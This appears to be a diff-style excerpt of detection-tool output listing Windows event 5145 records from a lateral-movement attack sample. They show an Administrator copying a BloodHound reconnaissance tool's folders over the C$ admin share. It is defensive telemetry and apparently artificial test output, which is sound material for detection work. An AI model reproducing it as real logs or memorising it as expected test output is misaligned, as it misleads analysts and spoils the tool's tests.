+2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-is-absolute  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pify  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pkg-up  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-limit  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-locate  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\process-nextick-args  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-try  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\punycode  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\cjs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\umd  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.139 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\prop-types-extra  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-overlays  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-prop-types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\uncontrollable  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.199 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\cjs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\umd  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\.github  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\components  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\icons  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\components  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\icons  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\cjs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\umd  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-lifecycles-compat  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__\__snapshots__  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage\lcov-report  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
